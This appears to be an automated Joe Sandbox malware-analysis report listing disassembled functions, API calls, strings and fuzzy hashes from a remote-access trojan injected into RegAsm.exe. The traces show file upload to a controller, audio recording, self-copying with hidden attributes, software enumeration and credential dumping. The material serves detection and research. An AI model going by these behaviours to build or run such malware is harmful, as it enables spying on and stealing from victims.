                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                                  • API String ID: 2649220323-436679193
                                  • Opcode ID: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                  • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                  • Opcode Fuzzy Hash: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                  • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                  Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                  • API String ID: 738084811-2094122233
                                  • Opcode ID: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                  • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                  • Opcode Fuzzy Hash: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                  • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                  Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Write$Create
                                  • String ID: RIFF$WAVE$data$fmt
                                  • API String ID: 1602526932-4212202414
                                  • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                  • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                  • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                  • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                  Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                  • API String ID: 1646373207-255920310
                                  • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                  • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                  • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                  • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                  Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcslen.LIBCMT ref: 0040CE42
                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                  • _wcslen.LIBCMT ref: 0040CF21
                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CFBF
                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                  • _wcslen.LIBCMT ref: 0040D001
                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                  • API String ID: 1579085052-2309681474
                                  • Opcode ID: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                  • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                  • Opcode Fuzzy Hash: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                  • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                  Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                  • _wcslen.LIBCMT ref: 0041C1CC
                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                  • GetLastError.KERNEL32 ref: 0041C204
                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                  • GetLastError.KERNEL32 ref: 0041C261
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                  • String ID: ?
                                  • API String ID: 3941738427-1684325040
                                  • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                  • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                  Function 00414DC1 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                  • String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                  • API String ID: 2490988753-3346362794
                                  • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                  • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                  • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                  • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                  Function 0044F4AD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$EnvironmentVariable$_wcschr
                                  • String ID:
                                  • API String ID: 3899193279-0
                                  • Opcode ID: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                  • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                  • Opcode Fuzzy Hash: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                  • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                  Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                  • String ID: /stext "$0TG$0TG$NG$NG
                                  • API String ID: 1223786279-2576077980
                                  • Opcode ID: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                  • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                  • Opcode Fuzzy Hash: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                  • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                  Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                  • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                  • API String ID: 1332880857-3714951968
                                  • Opcode ID: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                  • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                  • Opcode Fuzzy Hash: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                  • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                  Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                  • String ID: Close
                                  • API String ID: 1657328048-3535843008
                                  • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                  • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                  • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                  • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                  Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$Info
                                  • String ID:
                                  • API String ID: 2509303402-0
                                  • Opcode ID: 75151fbced3465edae0101cd141662f582d879f03032417287744dbc83fd132d
                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                  • Opcode Fuzzy Hash: 75151fbced3465edae0101cd141662f582d879f03032417287744dbc83fd132d
                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                  Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                  • __aulldiv.LIBCMT ref: 00408D88
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                  • API String ID: 3086580692-2582957567
                                  • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                  • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                  • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                  • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                  Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                  • API String ID: 3795512280-1152054767
                                  • Opcode ID: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                  • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                  • Opcode Fuzzy Hash: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                  • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                  Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • connect.WS2_32(?,?,?), ref: 004048E0
                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                  • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                  • API String ID: 994465650-3229884001
                                  • Opcode ID: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                  • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                  • Opcode Fuzzy Hash: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                  • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                  Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                  • _free.LIBCMT ref: 0045137F
                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                  • _free.LIBCMT ref: 004513A1
                                  • _free.LIBCMT ref: 004513B6
                                  • _free.LIBCMT ref: 004513C1
                                  • _free.LIBCMT ref: 004513E3
                                  • _free.LIBCMT ref: 004513F6
                                  • _free.LIBCMT ref: 00451404
